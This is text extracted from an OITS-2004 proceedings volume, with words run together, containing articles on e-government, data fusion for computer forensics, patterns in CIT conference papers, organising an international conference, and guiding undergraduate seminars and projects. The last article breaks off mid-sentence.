the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

